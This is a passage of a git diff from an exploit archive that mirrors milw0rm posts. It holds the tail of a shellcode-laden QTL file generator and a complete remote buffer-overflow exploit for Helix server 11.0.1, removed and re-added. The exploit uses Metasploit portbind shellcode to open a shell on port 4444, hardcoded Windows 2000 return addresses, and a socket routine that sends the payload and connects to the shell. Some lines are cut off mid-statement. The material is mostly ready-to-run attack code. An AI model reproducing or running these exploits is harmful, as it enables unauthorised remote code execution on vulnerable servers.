"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" +shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" +shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" +shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" +shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" +shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" +shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" +shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" +shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" +shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" +shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" +shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" +shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" +shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" +shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" +shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" +shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" +shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" +shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" +shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" +shellcode += "\x4f\x4f\x42\x4d\x5a\x90" +shellcode += "\x90" * 90 + + +def CreateQTL(sp): + if sp == "1": + JMPedi = '\xf5\x0c\xe5\x77' #Address of jmp edi from user32.dll + elif sp == "2": + JMPedi = '\x34\xd9\xe4\x77' #Address of jmp edi from user32.dll + else: + print 'Unsupported Service pack number' + sys.exit(-1) + + #XML template from http://www.milw0rm.org/exploits/3064 + QTL = "" + QTL += "" + QTL += "\n" + + fd = open('./exp.qtl', 'w') + fd.write(QTL) + fd.close() + +if __name__ == '__main__': + try: + sp = sys.argv[1] + except IndexError: + print 'Usage: %s \n' % sys.argv[0] + print 'Version: 1 => windows 2000 server SP0' + print 'Version: 2 => windows 2000 server SP4' + sys.exit(-1) + + CreateQTL(sp) + +# milw0rm.com [2007-01-03] diff --git a/platforms/windows/remote/3531.py b/platforms/windows/remote/3531.py index 67389225f..909908307 100755 --- a/platforms/windows/remote/3531.py +++ b/platforms/windows/remote/3531.py @@ -1,121 +1,121 @@ -#/usr/bin/python -# Remote exploit for the vulnerability in Helix server v11.0.1 as described -# at http://gleg.net/helix.txt -# -# The exploit spawns a shell on TCP port 4444 and connects to it. At the time of -# overflow we control EAX which is used in a call as follows -# 00420C64: call dword ptr [eax + 4] -# ECX points into our buffer at the time of overflow. So if we can craft a DWORD -# that points to an address that translates to call dword ptr [ecx + xx] and -# have a pointer into our shellcode at that location then our shellcode executes -# Yes, a lot of indirection here :-). This exploit uses hardcoded address which -# worked fine on Windows 2000 server SP4 machines I have in my test lab. You may -# have to tweak it for your environment. -# Credits for discovery and POC goes to Evgeny Legerov -# Author shall bear no reponsibility for any screw ups caused by using this code -# Winny Thomas :-) - -import os -import sys -import time -import base64 -import socket -import struct - -#alphanumeric portbind shellcode from metasploit. Binds shell to port 4444 -shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" -shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" -shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" -shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" -shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" -shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" -shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" -shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" -shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" -shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" -shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" -shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" -shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" -shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" -shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" -shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" -shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" -shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" -shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" -shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" -shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" -shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" -shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" -shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" -shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" -shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" -shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" -shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" -shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" -shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" -shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" -shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" -shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" -shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" -shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" -shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" -shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" -shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" -shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" -shellcode += "\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - -def ExploitHelix(target): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((target, 554)) - - payload = 'A' * 1116 - # This DWORD in payload causes a call into the next DWORD - payload += struct.pack('\n' % sys.argv[0] - sys.exit(-1) - - ExploitHelix(target) - print 'Exploit sent to: %s' % target - print 'Connecting to %s:4444' % target - time.sleep(3) - ConnectRemoteShell(target) - -# milw0rm.com [2007-03-21] +#/usr/bin/python +# Remote exploit for the vulnerability in Helix server v11.0.1 as described +# at http://gleg.net/helix.txt +# +# The exploit spawns a shell on TCP port 4444 and connects to it. At the time of +# overflow we control EAX which is used in a call as follows +# 00420C64: call dword ptr [eax + 4] +# ECX points into our buffer at the time of overflow. So if we can craft a DWORD +# that points to an address that translates to call dword ptr [ecx + xx] and +# have a pointer into our shellcode at that location then our shellcode executes +# Yes, a lot of indirection here :-). This exploit uses hardcoded address which +# worked fine on Windows 2000 server SP4 machines I have in my test lab. You may +# have to tweak it for your environment. +# Credits for discovery and POC goes to Evgeny Legerov +# Author shall bear no reponsibility for any screw ups caused by using this code +# Winny Thomas :-) + +import os +import sys +import time +import base64 +import socket +import struct + +#alphanumeric portbind shellcode from metasploit. Binds shell to port 4444 +shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" +shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" +shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" +shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" +shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" +shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" +shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" +shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" +shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" +shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" +shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" +shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" +shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" +shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" +shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" +shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" +shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" +shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" +shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" +shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" +shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" +shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" +shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" +shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" +shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" +shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" +shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" +shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" +shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" +shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" +shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" +shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" +shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" +shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" +shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" +shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" +shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" +shellcode += "\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + +def ExploitHelix(target): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((target, 554)) + + payload = 'A' * 1116 + # This DWORD in payload causes a call into the next DWORD + payload += struct.pack('\n' % sys.argv[0] + sys.exit(-1) + + ExploitHelix(target) + print 'Exploit sent to: %s' % target + print 'Connecting to %s:4444' % target + time.sleep(3) + ConnectRemoteShell(target) + +# milw0rm.com [2007-03-21]